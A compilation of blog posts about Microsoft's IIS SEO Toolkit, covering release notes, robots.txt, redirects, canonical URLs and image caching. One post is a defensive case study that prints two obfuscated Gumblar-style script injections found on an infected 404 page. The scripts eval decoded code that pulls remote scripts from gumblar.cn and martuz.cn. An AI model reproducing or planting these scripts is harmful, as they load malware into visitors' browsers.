• CarlosAg Blog

    IIS Search Engine Optimization (SEO) Toolkit – Announcing Beta 2


    Yesterday we released the Beta 2 version of the IIS Search Engine Optimization (SEO) Toolkit. This version builds upon Beta 1 adding a set of new features and several bug fixes reported through the SEO forum:

    1. Report Comparison. You now have the ability to compare two reports and track the metrics that changed between them, such as new and removed URLs, changed and unchanged URLs, violations fixed and new violations introduced. You can also compare the details and the contents side-by-side to see exactly what changed, whether in markup, headers, or anywhere else. This feature allows you to easily keep track of changes on your Web site. More on this feature in a future blog post.
    2. Authentication Support. You can now crawl Web sites that secure content through both Basic and Windows Authentication. This feature is required to crawl Intranet sites as well as certain staging environments that are protected by credentials.
    3. Extensibility.
      1. Developers can now extend the crawling process by providing custom modules that can parse new content types or add new violations.
      2. Developers can also provide additional sets of tasks for the User Interface to expose additional features in the Site Analyzer UI as well as the Sitemaps UI.
    4. Canonical Link Support. The crawler now understands canonical links (rel="canonical") and contains a new set of violations to detect five common mistakes, such as invalid use, incorrect domains, etc. The User Interface has also been extended to leverage this concept, so you can generate queries using the "Canonical URL" field, and the Sitemaps User Interface has been extended to better filter out URLs that are not canonical. For more information on canonical links see:
    5. Export. There are now three new menu items: "Export all Violations", "Export all URLs" and "Export all Links". The data is saved in CSV (comma-separated values) format that can easily be opened with Excel or any other spreadsheet program (or even Notepad). Log Parser is another tool that can be used to run SQL-like queries against the files (see the sketch after this list).
    6. Open Source Files and Directories. To facilitate fixing violations, when you crawl the content locally you now get a context menu to open the file, or the directory that contains it, in the pre-configured editor with a single click.
    7. Usability feedback. We made many changes in the User Interface to simplify workflows and feature discovery, based on the usability feedback we received.
      1. Now we have a Start Menu Program to open the feature directly (IIS Search Engine Optimization (SEO) Toolkit).
      2. New Search Engine Optimization page. All the features are now surfaced from a single page, along with common tasks and the most recently used content within them, so that with a single click you get to what you need.
      3. Query Builder updates, better UI for aggregation, auto-suggest for some fields, and better/cleaner display in general.
      4. Automatically start common tasks as part of a workflow.
      5. Less use of Tabs. We learned that users felt uncomfortable having multiple tabs opened, such as when "drilling down" from a Violations query to see the details. In this version the "drill-down" happens in a popup dialog to facilitate navigation and preserve the context of where you were before. We also kept the option to open them in tabs by using the "Open Group in New Query" context menu option for those who actually liked that.
      6. Added a new Violations tab in the details dialog to facilitate fixing issues page-by-page from the Details dialog.
      7. New grouping by start time in the reports page.
      8. Many more…
    8. Many bug fixes, such as fixes for CSS parsing (comments, URL detection, etc.), URL resolution for relative URLs, reduced noise for violations in redirects, better parsing of CSS styles inside HTML, fixes for HTML-to-text conversion, better handling of the storage of cached files, fixed date format in sitemaps, better bi-directional and right-to-left rendering, etc.
    9. Status codes in the 400-600 range are now flagged as broken links.
    10. The Robots editor can now open the robots.txt file, and a couple of processing issues were fixed.
    11. The Sitemaps editor has better filtering and handling of canonical URLs.
    12. Many more
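
    As an illustration of the Log Parser option mentioned in item 5, here is a minimal sketch of a query against an exported CSV file; the file name (violations.csv) and the column name (ViolationTitle) are assumptions, so adjust them to match the headers your export actually contains:

    LogParser.exe -i:CSV "SELECT ViolationTitle, COUNT(*) AS Total FROM violations.csv GROUP BY ViolationTitle ORDER BY Total DESC"

    The -i:CSV switch selects the CSV input format, which by default treats the first row of the file as the column names, so whatever columns the export contains can be used directly in the SELECT, GROUP BY and ORDER BY clauses.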

    This version can upgrade a Beta 1 installation and is fully compatible with it (i.e. your reports continue to work with the new version), so go ahead and try it and PLEASE provide us with feedback at the SEO Forum on the IIS Web site.

    Click here to install the IIS SEO Toolkit.

  • CarlosAg Blog

    SEO Tip - Beware of the Login pages - add them to Robots Exclusion


    A lot of sites today have the ability for users to sign in to see some sort of personalized content, whether it's a forum, a news reader, or some e-commerce application. To simplify their users' lives they usually want to give them the ability to log on from any page of the site they are currently looking at. Similarly, in an effort to keep navigation simple for users, Web sites usually generate dynamic links that provide a way to go back to the page the user was on before visiting the login page, something like: <a href="/login?returnUrl=/currentUrl">Sign in</a>.

    If your site has a login page you should definitely consider adding it to the Robots Exclusion list, since it is a good example of the things you do not want a search engine crawler to spend its time on. Remember a crawler spends a limited amount of time on your site and you really want it to focus on what is important.

    Out of curiosity I searched for login.php and login.aspx and found over 14 million login pages… that is a lot of useless content in a search engine.

    Another big reason is that having this kind of URL vary depending on each page means there will be hundreds of variations that crawlers will need to follow, like /login?returnUrl=page1.htm, /login?returnUrl=page2.htm, etc., so you have basically doubled the work for the crawler. And even worse, in some cases if you are not careful you can easily cause an infinite loop for them when you add the same "login link" on the actual login page, since you get /login?returnUrl=login as the link, and when you click that you get /login?returnUrl=login?returnUrl=login... and so on, with an ever-changing URL for each page on your site. Note that this is not hypothetical; this is actually a real example from a few famous Web sites (which I will not disclose). Of course crawlers will not infinitely crawl your Web site; they are not that silly and will stop after looking at the same resource /login a few hundred times, but this means you are just reducing the time they spend looking at what really matters to your users.

    IIS SEO Toolkit

    If you use the IIS SEO Toolkit, it will detect the condition where the same resource (like login.aspx) is used too many times (varying only the Query String) and will give you a violation error like: Resource is used too many times.


    So how do I fix this?

    There are a few fixes, but by far the best thing to do is just add the login page to the Robots Exclusion protocol.

    1. Add the URL to your /robots.txt. You can use the IIS Search Engine Optimization Toolkit to edit the robots file, or just drop a file with something like:
      User-agent: *
      Disallow: /login
    2. Alternatively (or additionally)  you can add a rel attribute with the nofollow value to tell them not to even try. Something like:
      <a href="/login?returnUrl=page" rel="nofollow">Log in</a>
    3. Finally, use the Site Analysis feature in the IIS SEO Toolkit to verify you don't have this kind of behavior. It will automatically flag a violation when it identifies that the same "page" (with different Query Strings) has already been visited over 500 times.


    To summarize, always add the login page to the robots exclusion file; otherwise you will end up:

    1. sacrificing valuable "search engine crawling time" in your site.
    2. spending unnecessary bandwidth and server resources.
    3. potentially even blocking crawlers from your content.
  • CarlosAg Blog

    Finding malware in your Web Site using IIS SEO Toolkit


    The other day a friend of mine who owns a Web site asked me to look at his Web site to see if I could spot anything weird since according to his Web Hosting provider it was being flagged as malware infected by Google.

    My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. The designer downloaded the HTML pages and tried looking for anything suspicious in them, but was not able to find anything. My friend then went back to his hosting provider, mentioned that they had not been able to find anything problematic, and asked whether it could be something in the server configuration, to which they replied sarcastically that it was probably ignorance on the part of his Web site designer.

    Enter IIS SEO Toolkit

    So of course I decided the first thing I would do was crawl the Web site using Site Analysis in the IIS SEO Toolkit. This gave me a list of the pages and resources on his Web site. I knew that malware usually hides either in executables or in scripts on the server, so I started looking at the different content types shown in the "Content Types Summary" inside the Content reports on the dashboard page.


    I was surprised to not find a single executable and to only see two very simple JavaScript files, neither of which looked like malware in any way. Based on previous knowledge I knew that malware in HTML pages usually hides behind a funky-looking script that is encoded and usually uses the eval function to run the code. So I quickly did a query for the HTML pages that contain the word eval and contain the word unescape. I know there are valid scripts that include those functions, since they exist for a reason, but it was a good way to start scoping the pages.

    Gumblar and Malware on sight


    After running the query as shown above, I got a set of HTML files which all gave a status code 404 – NOT FOUND. Double-clicking any of them and looking at the HTML markup content made it immediately obvious they were malware infected; look at the following markup:

    <TITLE>404 Not Found</TITLE>
    <script language=javascript><!-- 
    (function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
    </script><script language=javascript><!-- 
    (function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
    <H1>Not Found</H1>
    The requested document was not found on this server.
    Web Server at **********

    Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer who writes code like that in real Web applications.

    For those of you who, like me, do not particularly enjoy reading encoded JavaScript, what these two scripts do is just unescape the funky-looking string and then execute it. I have decoded the script that would get executed and shown it below, just to showcase how this malware works. Note how they special-case a couple of browsers, including Chrome, to then request a particular script that will cause the real damage.

    var a = "ScriptEngine",
        b = "Version()+",
        j = "",
        u = navigator.userAgent;
    if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
        zrvzts = "A";
        eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
        document.write("<script src=//" + j + "><\/script>");
    }


    var a="ScriptEngine", b="Version()+", j="", u=navigator.userAgent;
    if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
    zrvzts="A";
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//"+j+"><\/script>");
    }

    Notice how both of them end up writing a script tag that pulls the actual malware script from gumblar.cn and martuz.cn respectively (the domains are spelled out inside the encoded strings shown above).

    Final data

    Now, this clearly means they are infected with malware, and it clearly seems that the problem is not in the Web application; the infection is in the error pages being served by the server when an error happens. As the next step, to be able to guide them with more specifics, I needed to determine which Web server they were using. To do that it is as easy as inspecting the headers in the IIS SEO Toolkit, which displayed something like the ones shown below:

    Accept-Ranges: bytes
    Content-Length: 2570
    Content-Type: text/html
    Date: Sat, 20 Jun 2009 01:16:23 GMT
    Last-Modified: Sun, 17 May 2009 06:43:38 GMT
    Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

    With the big disclaimer that I know nothing about Apache, I then guided them to their .htaccess file and the httpd.conf file to look for ErrorDocument entries; that would show them which files were infected and whether it was a problem in their application or in the server.

    Case Closed

    It turns out that after they went back to their hoster with all this evidence, they finally realized that their server was infected and were able to clean up the malware. The IIS SEO Toolkit helped me quickly identify this because it is able to see the Web site with the same eyes as a search engine would, following every link and letting me perform easy queries to find information about it. In future versions of the IIS SEO Toolkit you can expect to be able to find these kinds of things in much simpler ways, but for Beta 1, for those who care, here is the query that you can save in an XML file and use "Open Query" to see if you are infected with this malware.

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
    <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
    <expression field="FileContents" operator="Contains" value="unescape" />
    <expression field="FileContents" operator="Contains" value="eval" />
    <field name="URL" />
    <field name="StatusCode" />
    <field name="Title" />
    <field name="Description" />
    </query>
  • CarlosAg Blog

    IIS SEO Tip - Do not stress your server, limit the number of concurrent requests


    The other day somebody asked me if there was a way to limit the amount of work that Site Analysis in the IIS SEO Toolkit causes on the server. This is interesting for a couple of reasons:

    • You might want to reduce the load that Site Analysis causes on your server at any given time
    • You might have a denial-of-service detection system, such as our Dynamic IP Restrictions IIS module, that will start failing requests based on the number of requests issued in a certain amount of time
    • Or, if like me you have to go through a proxy, it might have a configured limit on the number of requests per minute you are allowed to issue

    In Beta 1 we do not support the Crawl-delay directive of the Robots Exclusion protocol; in future versions we will look at adding support for this setting. The good news is that Beta 1 does have a configurable setting that can help you achieve these goals, called Maximum Number of Concurrent Requests.
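
    For reference, Crawl-delay is a non-standard robots.txt directive that some crawlers honor as the number of seconds to wait between requests (Site Analysis Beta 1 simply ignores it); it looks something like this:

    User-agent: *
    Crawl-delay: 10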

    To set it:

    1. Go to the Site Analysis Reports page
    2. Select the option "Edit Feature Settings..." as shown in the next image
    3. In the "Edit Feature Settings" dialog you will see the Maximum Number of Concurrent Requests option, which you can set to any value from 1 to 16. The default value is 8, which means that at any given time we will issue at most 8 concurrent requests to the server.
  • CarlosAg Blog

    Redirects, 301, 302 and IIS SEO Toolkit


    In the URL Rewrite forum somebody posted the question "are redirects bad for search engine optimization?". The answer is: not necessarily. Redirects are an important tool for Web sites, and used in the right context they are actually a required tool. But first, a bit of background.

    What is a Redirect?

    A redirect, in simple terms, is a way for the server to indicate to a client (typically a browser) that a resource has moved, and it does this by the use of an HTTP status code and an HTTP Location header. There are different types of redirects, but the most commonly used ones are:

    • 301 - Moved Permanently. This type of redirect signals that the resource has permanently moved and that any further attempts to access it should be directed to the location specified in the header
    • 302 - Redirect or Found. This type of redirect signals that the resource is temporarily located in a different location, but any further attempts to access the resource should still go to the same original location.

    Below is an example of the response sent from the server when requesting a URL that is temporarily redirected:

    HTTP/1.1 302 Found
    Connection: Keep-Alive
    Content-Length: 161
    Content-Type: text/html; charset=utf-8
    Date: Wed, 10 Jun 2009 17:04:09 GMT
    Location: /sqlserver/2008/en/us/default.aspx
    Server: Microsoft-IIS/7.0
    X-Powered-By: ASP.NET
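
    For comparison, a permanent redirect differs mainly in the status line; a hypothetical 301 response for the same resource would look something like this:

    HTTP/1.1 301 Moved Permanently
    Content-Length: 161
    Content-Type: text/html; charset=utf-8
    Location: /sqlserver/2008/en/us/default.aspx
    Server: Microsoft-IIS/7.0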


    So what do redirects mean for SEO?

    One of the most important factors in SEO is the concept called organic linking; in simple words it means that your page gets extra points for every link that external Web sites have pointing to it. So now imagine the search engine bot is crawling an external Web site and finds a link pointing to your page (say some-page), and when it tries to visit your page it runs into a redirect to another location (say somepage). Now the search engine has to decide if it should add the original "some-page" to its index, whether it should "add the extra points" to the new location or to the original location, or if it should just ignore it entirely. Well, the answer is not that simple, but a simplification of it could be:

    • if you return a 301 (Permanent Redirect) you are telling the search engine that the resource moved to a new location permanently so that all further traffic should be directed to that location. This clearly means that the search engine should ignore the original location (some-page) and index the new location (somepage), and that it should add all the "extra points" to it, as well as any further references to the original location should now be "treated" as if it was the new one.
    • if you return a 302 (Temporary Redirect) the answer can depend on the search engine, but it is likely to decide to index the original location and ignore the new location altogether (unless it is directly linked in other places), since the redirect is only temporary and the original location could at any given point stop redirecting and start serving the content itself. This of course makes it very ambiguous how to deal with the "extra points", and they will likely be added to the original location and not the new destination.


    Enter IIS SEO Toolkit

    The IIS Search Engine Optimization Toolkit has a set of rules that look for different patterns related to redirects. The Beta version includes the following:

    1. The redirection did not include a location header. Believe it or not, there are a couple of applications out there that do not generate a Location header, which completely breaks the model of redirection. So if your application is one of them, it will let you know.
    2. The redirection response results in another redirection. In this case it detected that your page (A) links to another page (B) which caused a redirection to another page (C) which resulted in yet another redirection to page (D). It is trying to let you know that the number of redirects could significantly impact the SEO "bonus points", since the organic linking could be broken by all this jumping around, and that you should consider just linking from (A) to (D), or whatever end page is supposed to be the final destination.
    3. The page contains unnecessary redirects. In this case it detected that your page (A) links to another page (B) in your Web site that resulted in a redirect to another page (C) within your Web site. Note that this is an informational rule, since there are valid scenarios where you would want this behavior, such as tracking page impressions, login pages, etc., but in many cases you do not need them. Since we detect that you own all three pages, we are suggesting you look and see whether it wouldn't be better to just change the markup in (A) to point directly to (C) and avoid the (B) redirection entirely.
    4. The page uses a refresh definition instead of using redirection. Finally, related to redirection, IIS SEO will flag when it detects that the refresh meta-tag is being used as a means of causing a redirection. This practice is not recommended, since the tag does not include any semantics for search engines on how to process the content, and in many cases it is actually considered a tactic to confuse search engines, but I won't go there.

    So what does it look like? In the image below I ran Site Analysis against a Web site and it found a few of these violations (2 and 3).


    Notice that when you double-click the violations it will tell you the details as well as give you direct access to the related URLs, so that you can look at the content and all the relevant information about them to make the decision. From that menu you can also look at which other pages are linking to the different pages involved, as well as launch them in the browser if needed.


    Similarly with all the other violations it tries to explain the reason it is being flagged as well as recommended actions to follow for each of them.

    The IIS Search Engine Optimization Toolkit can also help you find all the different types of redirects and the locations where they are being used in a very easy way: just select Content->Status Code Summary in the Dashboard view and you will see all the different HTTP status codes received from your Web site. Notice in the image below how you can see the number of redirects (in this case 18 temporary redirects and 2 permanent redirects). You can also see how much content they accounted for, in this case about 2.5 KB (note that I've seen Web sites generate a large amount of useless content in redirect traffic, speaking of wasted bandwidth). You can double-click any of those rows and it will show you the details of the URLs that returned that status, and from there you can see who links to them, etc.


    So what should I do?

    1. Know your Web site. Run Site Analysis against your Web site and see all the different redirects that are happening.
    2. Try to minimize redirections. If possible, with the knowledge gained in step 1, look for places where you can update your content to reduce the number of redirects.
    3. Use the right redirect. Understand the intent of the redirection you are trying to do and make sure you are using the right semantics (is it permanent or temporary?). Whenever possible prefer permanent redirects (301).
    4. Use URL Rewrite to easily configure them. URL Rewrite allows you to configure a set of rules, using both regular expressions and wildcards, that live along with your application (no administrative privileges required) and that let you set the right redirection status code (see the sketch after this list). A must for SEO. More on this in a future blog post.
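
    As a minimal sketch of the kind of rule item 4 refers to (the rule name and the URLs are made up for illustration), a web.config fragment like the following issues a permanent (301) redirect from an old page to its new location:

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
      <system.webServer>
        <rewrite>
          <rules>
            <!-- Hypothetical example: permanently redirect the old URL to the new one -->
            <rule name="Old page permanent redirect" stopProcessing="true">
              <match url="^old-page\.aspx$" />
              <action type="Redirect" url="new-page.aspx" redirectType="Permanent" />
            </rule>
          </rules>
        </rewrite>
      </system.webServer>
    </configuration>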


    So going back to the original question: "are redirects bad for Search Engine Optimization?". Not necessarily; they are an important tool used by Web applications for many reasons, such as:

    • Canonicalization. To ensure that users access your site consistently with or without the www. prefix, use permanent redirects.
    • Page impressions and analytics. Using temporary redirects to ensure that the original link is preserved and counters work as expected.
    • Content reorganization. Whether you are changing your host due to a brand change or just renaming a page, you should make sure to use permanent redirects to keep your page rankings.
    • etc

    Just make sure you don't abuse them with redirects to redirects, unnecessary redirects, or infinite loops, and use the right semantics.

  • CarlosAg Blog

    Canonical Formats and Query Strings - IIS SEO Toolkit


    Today somebody was running the IIS SEO Toolkit, and the Site Analysis feature flagged a lot of violations of "The page contains multiple canonical formats.". The reason, apparently, is that he uses Query String parameters to pass contextual or other information between pages. This of course yields the question: does that mean query strings in general are bad news SEO-wise?

    Well, the answer is not necessarily.

    I will start by clarifying that this violation in Site Analysis means that our algorithm detected that two URLs look like the same content; note that we make no assumptions based on the URL (including Query String parameters). This kind of situation is bad for a couple of reasons:

    1. Based on the fact that they look like the same page, search engines will probably choose one of them, index it as the real content and discard the other one. The problem is that you are leaving this decision to the search engines, which means some might choose the wrong version and end up using the one with Query String parameters instead of the clean one (not likely, though). Or even worse, they might end up indexing both of them as if they were different.
    2. When other Web sites look at your content and add links to it, some of them might end up using the URL with the different Query String parameters and some of them not. What this means is that the organic linking will not give you the benefits that it otherwise would. Remember search engines give you "extra" points when somebody external references your page, but now you'll be splitting the earnings between "two pages" instead of a single canonical form.

    Query Strings by themselves do not pose a terrible threat to SEO; most modern search engines deal OK with Query Strings. However, it is the organic linking and the potential abuse of Query Strings that could give you headaches.

    Remember, search engines can make no assumptions when a single "page" serves tons of content through a single absolute path and the use of Query Strings. This is typical in many cases, such as when using index.php, where pretty much every page on the site is served by the same resource, just using variations of Query Strings or path information.


    So what should I do?

    Well, there are several things you could do, but probably one of the easiest is to just tell search engines (more specifically crawlers or bots) not to index the pages that have the Query String variations that are really only meant for the application to pass state, not to specify different content. This can be done using the Robots Exclusion protocol, using wildcard matching to tell them not to follow any URL that contains a '?'. Note that you should make sure you are not blocking URLs that actually are supposed to be indexed. For this you can run the Site Analysis feature again, and it will flag an informational message for each URL that is not visited due to the robots exclusion file.

    User-agent: *
    Disallow: /*?


    In summary, try to keep canonical formats yourself; don't leave any guesses to search engines, because some of them might get it wrong. There is a new way of specifying the canonical form in your markup, but it is "very recent" (as in 2009) and some search engines do not support it (I believe the top three do, though), using the new rel="canonical":

    <link rel="canonical" href="" />

    In the Beta 2 version of the IIS SEO Toolkit we will support this tag and have better detection of these canonical issues. So stay tuned.

    Another way to solve this is to use URL Rewrite so that you can easily redirect or rewrite your URLs to get rid of the Query Strings and use more SEO-friendly URLs, as in the sketch below.
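
    As a minimal sketch of that idea (the rule name, the index.php resource and the page parameter are made-up examples), a web.config rule like the following permanently redirects index.php?page=some-name to a clean /some-name URL:

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
      <system.webServer>
        <rewrite>
          <rules>
            <!-- Hypothetical example: redirect index.php?page=some-name to /some-name -->
            <rule name="Query string to clean URL" stopProcessing="true">
              <match url="^index\.php$" />
              <conditions>
                <add input="{QUERY_STRING}" pattern="^page=([^=&amp;]+)$" />
              </conditions>
              <action type="Redirect" url="{C:1}" appendQueryString="false" redirectType="Permanent" />
            </rule>
          </rules>
        </rewrite>
      </system.webServer>
    </configuration>

    In a real application you would also add a companion rewrite rule that maps the clean URL back to index.php internally, so the friendly URL actually serves the content.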

  • CarlosAg Blog

    Are you caching your images and scripts? IIS SEO can tell you


    One easy way to enhance the experience of users visiting your Web site is to increase the perceived performance of navigating your site by reducing the number of HTTP requests required to display a page. There are several techniques for achieving this, such as merging scripts into a single file, merging images into one big image, etc., but by far the simplest one of all is making sure that you cache as much as you can on the client. This will not only improve rendering time but will also reduce the load on your server and reduce your bandwidth consumption.

    Unfortunately the different types of caches and the different ways of setting them can be quite confusing and esoteric. So my recommendation is to pick one way and use it all the time, and that way is using the HTTP 1.1 Cache-Control header.

    So first of all, how do I know if my application is being well behaved and sending the right headers so browsers can cache its content? You can use a network monitor or tools like Fiddler or WFetch to look at all the headers and figure out if they are getting sent correctly. However, you will soon realize that this process won't scale for a site with hundreds if not thousands of scripts, styles and images.

    Enter Site Analysis - IIS Search Engine Optimization Toolkit

    To figure out if your images are sending the right headers you can follow the next steps:

    1. Install the IIS Search Engine Optimization Toolkit from IIS.NET.
    2. Launch InetMgr.exe (IIS Manager) and crawl your Web Site. For more details on how to do that refer to the article "Using Site Analysis to crawl a web site".
    3. Once you are in the Site Analysis dashboard view you can start a New Query by using the Menu "Query->New Query" and add the following criteria:
      1. Is External - Equals - False -> To only include the files that are coming from your Web site.
      2. Status code - Equals - OK -> To include only successful requests
      3. Content Type Normalized - Begins With - image/ -> To include only images
      4. Headers - Not Contains - Cache-Control: -> To include only the ones that do not have the Cache-Control header specified
      5. Headers - Not Contains - Expires: -> To include only the ones that do not have the Expires header
      6. Press Execute, and this will display all the images in your Web site that are not specifying any caching behavior.

    Alternatively you can just save the following query as "ImagesNotCached.xml" and use the Menu "Query->Open Query" for it. This should make it easy to open the query for different Web sites or keep testing the results when making changes:

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
    <expression field="IsExternal" operator="Equals" value="False" />
    <expression field="StatusCode" operator="Equals" value="OK" />
    <expression field="ContentTypeNormalized" operator="Begins" value="image/" />
    <expression field="Headers" operator="NotContains" value="Cache-Control:" />
    <expression field="Headers" operator="NotContains" value="Expires:" />
    <field name="URL" />
    <field name="ContentTypeNormalized" />
    <field name="StatusCode" />
    </query>

    How do I fix it?

    In IIS 7 this is trivial to fix: you can just drop a web.config file in the same directory as your images, scripts and CSS styles, specifying the caching behavior for them. The following web.config will send the Cache-Control header so that the browser caches the responses for up to 7 days.

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration><system.webServer><staticContent>
      <clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="7.00:00:00" />
    </staticContent></system.webServer></configuration>

    You can also do this through the UI (IIS Manager) by going to the "HTTP Response Headers" feature -> Set Common Headers..., or through any of our APIs using managed code, JavaScript or your favorite language:
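
    For example, here is a minimal managed-code sketch using Microsoft.Web.Administration (it needs a reference to Microsoft.Web.Administration.dll and administrative privileges to run); the site name and the /App_Themes path are just assumptions, so point it at whatever folder holds your static content:

    using System;
    using Microsoft.Web.Administration;

    class SetClientCache
    {
        static void Main()
        {
            using (ServerManager serverManager = new ServerManager())
            {
                // Open the web.config of the folder that holds the static content (names are assumptions)
                Configuration config = serverManager.GetWebConfiguration("Default Web Site", "/App_Themes");

                // Set system.webServer/staticContent/clientCache so that Cache-Control: max-age covers 7 days
                ConfigurationSection staticContent = config.GetSection("system.webServer/staticContent");
                ConfigurationElement clientCache = staticContent.GetChildElement("clientCache");
                clientCache["cacheControlMode"] = "UseMaxAge";
                clientCache["cacheControlMaxAge"] = TimeSpan.Parse("7.00:00:00");

                serverManager.CommitChanges();
            }
        }
    }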

    Furthermore, using the same query above in the Query Builder you can group by directory and find the directories that are really worth adding this to. It is just a matter of clicking the "Group by" button and adding URL-Directory to the Group by clauses. Not surprisingly, in my case it flags the App_Themes directory where I store 8 images.



    Finally, what about 304's?

    One thing to note is that even if you do not do anything, most modern browsers will use conditional requests to reduce latency if they have a copy in their cache. As an example, imagine the browser needs to display logo.gif as part of displaying test.htm and that image is available in its cache; the browser will issue a request like this:

    GET /logo.gif HTTP/1.1
    Accept: */*
    Referer: http://carlosag-client/test.htm
    Accept-Language: en-us
    User-Agent: (whatever-browser-you-are-using)
    Accept-Encoding: gzip, deflate
    If-Modified-Since: Mon, 09 Jun 2008 16:58:00 GMT
    If-None-Match: "01c13f951cac81:0"
    Host: carlosagdev:8080
    Connection: Keep-Alive

    Note the use of the If-Modified-Since header, which tells the server to only send the actual data if it has been changed after that time. In this case it hasn't, so the server responds with a status code 304 (Not Modified):

    HTTP/1.1 304 Not Modified
    Last-Modified: Mon, 09 Jun 2008 16:58:00 GMT
    Accept-Ranges: bytes
    ETag: "01c13f951cac81:0"
    Server: Microsoft-IIS/7.0
    X-Powered-By: ASP.NET
    Date: Sun, 07 Jun 2009 06:33:51 GMT

    Even though this helps, you can imagine that it still requires a whole round trip to the server, and even though the response is short, it can still have a significant impact if rendering of the page is waiting for it, as in the case of a CSS file that the browser needs to resolve to display the page correctly, or an <img> tag that does not include the dimensions (width and height attributes) and so requires the actual image to determine the required space (one reason why you should always specify the dimensions in markup to increase rendering performance).


    To summarize, with the IIS Search Engine Optimization Toolkit you can easily build your own queries to learn more about your own Web site, allowing you to easily find details that would otherwise be tedious to dig out. In this case I showed how easy it is to find all the images that are not specifying any caching headers, and you can do the same thing for scripts (Content Type Normalized equals application/javascript) or styles (Content Type Normalized equals text/css). This way you can improve rendering performance and reduce the overall bandwidth of your Web site.

  • CarlosAg Blog

    Announcing: IIS Search Engine Optimization Toolkit Beta 1


    Today we are releasing the IIS Search Engine Optimization Toolkit. The IIS SEO Toolkit is a set of features that aim to help you keep your Web site and its content in good shape for both Users and Search Engines.

    The features that are included in this Beta release include:

    • Site Analysis. This feature includes a crawler that looks at your Web site contents, discovering links, downloading the contents and applying a set of validation rules aimed at helping you easily troubleshoot common problems such as broken links and duplicate content, along with keyword analysis, route analysis and many more features that will help you improve the overall quality of your Web site.
    • Robots Exclusion Editor. This includes a powerful editor to author Robots Exclusion files. It can leverage the output of a Site Analysis crawl report and allow you to easily add the Allow and Disallow entries without having to edit a plain text file, making it less error prone and more reliable. Furthermore, you can run the Site Analysis feature again and see immediately the results of applying your robots files.
    • Sitemap and Sitemap Index Editor. Similar to the Robots editor, this allows you to author Sitemap and Sitemap Index files with the ability to discover both physical and logical (Site Analysis crawler report) view of your Site.

    Check out the great blog post about the IIS SEO Toolkit by ScottGu, or this simple IIS SEO video showing some of its capabilities.

    Run it in your Development, Staging, or Production Environments

    One of the problems with many similar tools out there is that they require you to publish the updates to your production sites before you can even use the tools, and of course they would never be usable for Intranet or internal applications that are not exposed to the Web. The IIS Search Engine Optimization Toolkit can be used internally in your own development or staging environments, giving you the ability to clean up the content before publishing to the Web. This way your users do not need to pay the price of broken links once you publish, and you will not need to wait for those tools or search engines to crawl your site to finally discover you broke things.

    For developers this means that they can now easily look at the potential impact of removing or renaming a file: easily check which files refer to a page and which files they can remove because they are only referenced by that page.

    Run it against any Web application built on any framework running on any server

    One thing that is important to clarify is that you can target and analyze your production sites if you want to, and you can target Web applications running on any platform, whether it's ASP.NET, PHP, or plain HTML files, running on your local IIS or on any other remote server.

    Bottom line, try it against your Web site, look at the different features and give us feedback for additional reports, options, violations, content to parse, etc, post any comments or questions at the IIS Search Engine Optimization Forum.

    The IIS SEO Toolkit documentation can be found at, but remember this is only Beta 1 so we will be adding more features and content.

    IIS Search Engine Optimization Toolkit

  • CarlosAg Blog

    IIS Manager Online Help Link gets updated


